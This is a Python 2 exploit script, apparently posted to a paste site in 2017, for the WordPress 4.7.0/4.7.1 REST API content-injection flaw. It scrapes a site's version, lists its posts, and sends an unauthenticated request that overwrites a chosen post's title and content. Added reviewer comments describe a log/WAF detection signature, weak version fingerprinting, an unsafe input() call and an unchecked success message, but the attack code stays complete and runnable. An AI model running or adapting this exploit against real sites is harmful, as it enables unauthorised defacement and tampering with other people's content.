doblej

wordpress 4.7.0 - 1 Json Bug

Jul 7th, 2017
  1. #! /usr/bin/env python
  2.  
  3. """
  4. Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  5. REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
  6. Wordpress Version Affected: 4.7.0/4.7.1
  7.  
  8. 2017 - Coded by snoww0lf.
  9. """
  10. import re
  11. import json
  12. import urllib2
  13.  
class WpContent:
    """Fetch a WordPress front page and talk to the REST API it advertises.

    The constructor downloads ``url`` once; the other methods scrape that
    cached HTML (REST API root, ``ver=`` string) or issue further requests
    against the scraped API root. No method attaches credentials, cookies or
    a nonce to any request.

    Defender context: the module docstring names WordPress 4.7.0/4.7.1 as the
    affected range, so hosts should run a release newer than that range. The
    request built in ``inject_content`` is the shape to look for in access
    logs and WAF rules.
    """

    def __init__(self, url):
        """Store ``url`` and download its body immediately.

        Constructing the object therefore performs network I/O; any urllib2
        error propagates to the caller because nothing here catches it.
        """
        self.__url = url
        # No timeout argument is passed to urlopen.
        self.__response = urllib2.urlopen(self.__url).read()

    def get_api_wp(self):
        """Return the first href captured after the ``https://api.w.org/`` marker.

        Raises IndexError when the cached page has no such marker, because the
        result list is indexed with ``[0]`` unconditionally.
        """
        # NOTE(review): presumably this is the REST API discovery <link> tag
        # that WordPress emits in the page head - confirm against a sample page.
        # The pattern expects single quotes and uses a greedy ``.*``, so the
        # capture runs to the last single quote on the matched line.
        return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

    def get_wp_version(self):
        """Return the first ``ver=`` value in the page plus a verdict suffix.

        The suffix says "Maybe vulnerable" only when the captured text is
        exactly ``4.7`` or ``4.7.1``. Raises IndexError when the page contains
        no ``ver=...`` followed by a double quote.
        """
        # NOTE(review): this is a weak fingerprint. ``ver=`` query strings on
        # asset URLs can carry a plugin's or theme's own version, and a site can
        # strip or rewrite them, so neither verdict proves the installed core
        # version. The greedy ``.*`` also captures up to the last double quote
        # on the line, which makes the exact-match test below easy to miss.
        # For patch verification, read the version on the host itself.
        check_version = re.findall(r'ver=(.*)"', self.__response)[0]
        if check_version == "4.7" or check_version == "4.7.1":
            check_version += " ( Maybe vulnerable to inject ) "
        else:
            check_version += " ( Maybe not vulnerable to inject ) "
        return check_version

    def get_wp_post_information(self):
        """List posts returned by ``<api root>wp/v2/posts`` as printable text.

        For every entry in the JSON response the id, rendered title, link and
        the first 100 characters of the rendered content are appended to one
        string, which is returned.
        """
        # Plain GET without credentials: only what the endpoint serves to an
        # anonymous client is listed.
        get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
        load_info = json.loads(get_post)
        collected_information = ""
        for load in load_info:
            # Title and snippet are encoded to UTF-8 byte strings before
            # formatting; the content is cut to 100 characters first.
            collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
            format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
        return collected_information

    def inject_content(self, id_content, title, content):
        """Send a JSON body with ``title`` and ``content`` to one post route.

        The target is ``<api root>wp/v2/posts/<id>/`` with an extra query
        parameter ``id=<id>CBF``. Returns the raw response body.
        """
        data = json.dumps({
            'title':title,
            'content':content
            })
        # Only a Content-Type header is set: no cookie, nonce or Authorization
        # header, so a server that enforces authentication on post updates
        # should refuse this request.
        params = {'Content-Type':'application/json'}
        # The route carries the numeric id while the query string repeats it
        # with a non-numeric suffix. NOTE(review): the server-side cause is
        # described in the Sucuri post linked in the module docstring.
        # Detection: an unauthenticated write to a posts/<id> REST route whose
        # ``id`` query value is not purely numeric is a useful log/WAF
        # signature.
        full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
        # Passing a data argument makes urllib2 issue a POST rather than a GET.
        req = urllib2.Request(full_url, data, params)
        resp = urllib2.urlopen(req).read()
        return resp
  49.  
def main():
    """Interactive driver around WpContent.

    Loops until the operator answers "n": asks for a URL, prints the scraped
    version string and, only when that string is exactly ``4.7`` or ``4.7.1``,
    offers to list the site's posts and send an overwrite request for one.
    """
    print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
    while True:
        url = raw_input("[x] Enter the URL: ")
        print("[?] Please wait ...\n")
        # The constructor fetches the URL; no try/except surrounds it, so a
        # network error or a page without the expected markers ends the script
        # with a traceback.
        wpcontent = WpContent(url)
        # split()[0] drops the verdict suffix that get_wp_version appended,
        # leaving the scraped version text for the same comparison again.
        wp_version = wpcontent.get_wp_version().split()[0]
        print("[x] Wordpress Version: {0} ".format(wp_version))
        if(wp_version == "4.7" or wp_version == "4.7.1"):
            select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
            # Re-prompt until the answer is exactly "y" or "n".
            while(select != "y" and select != "n"):
                print("[x] Wrong selection! Try again.")
                select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
            print("\n")
            if(select == "y"):
                print("[x] Parsing data information, please wait ...\n")
                wp_information = wpcontent.get_wp_post_information()
                print(wp_information)
                # NOTE(review): the file targets Python 2 (urllib2, raw_input),
                # where input() evaluates the typed text as a Python expression.
                # Anything entered at this prompt and at the mode prompt below
                # is executed locally; int(raw_input(...)) would avoid that.
                inp_id = input("[x] Enter ID Content that you want to overwrite: ")
                inp_title = raw_input("[x] Change title: ")
                print("\n")
                print("=> 1. Load data from file.")
                print("=> 2. Input data.")
                print("\n")
                mode = input("[x] Change content by [1/2] ? ")
                # Any value other than the integer 1 takes the else branch.
                if mode == 1:
                    dfile = raw_input("[x] Enter the filename: ")
                    # The whole file is read and sent as the new post content.
                    with open(dfile, 'r') as f:
                        readf = f.readlines()
                    print("[x] Exploit in progress ...\n")
                    wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
                else:
                    inp_data = raw_input("[?] Input data: ")
                    print("[x] Exploit in progress ...\n")
                    wpcontent.inject_content(inp_id, inp_title, inp_data)
                # The value returned by inject_content is discarded in both
                # branches, so this message only means no exception was raised;
                # it does not show that the server changed the post.
                print("[x] Update success!\n")
                cont = raw_input("[?] Continue ? [y/n] ").lower()
                while(cont != "y" and cont != "n"):
                    print("[x] Wrong selection! Try again.")
                    cont = raw_input("[?] Continue ? [y/n] ").lower()
                if cont == "n": break
            else:
                break
        else:
            # Version text was not 4.7 / 4.7.1: no request beyond the initial
            # page fetch is made for this URL.
            cont = raw_input("[?] Continue ? ").lower()
            while(cont != "y" and cont != "n"):
                print("[x] Wrong selection! Try again.")
                cont = raw_input("[?] Continue ? ").lower()
            if cont == "n": break
  99.  
# Start the interactive loop only when the file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()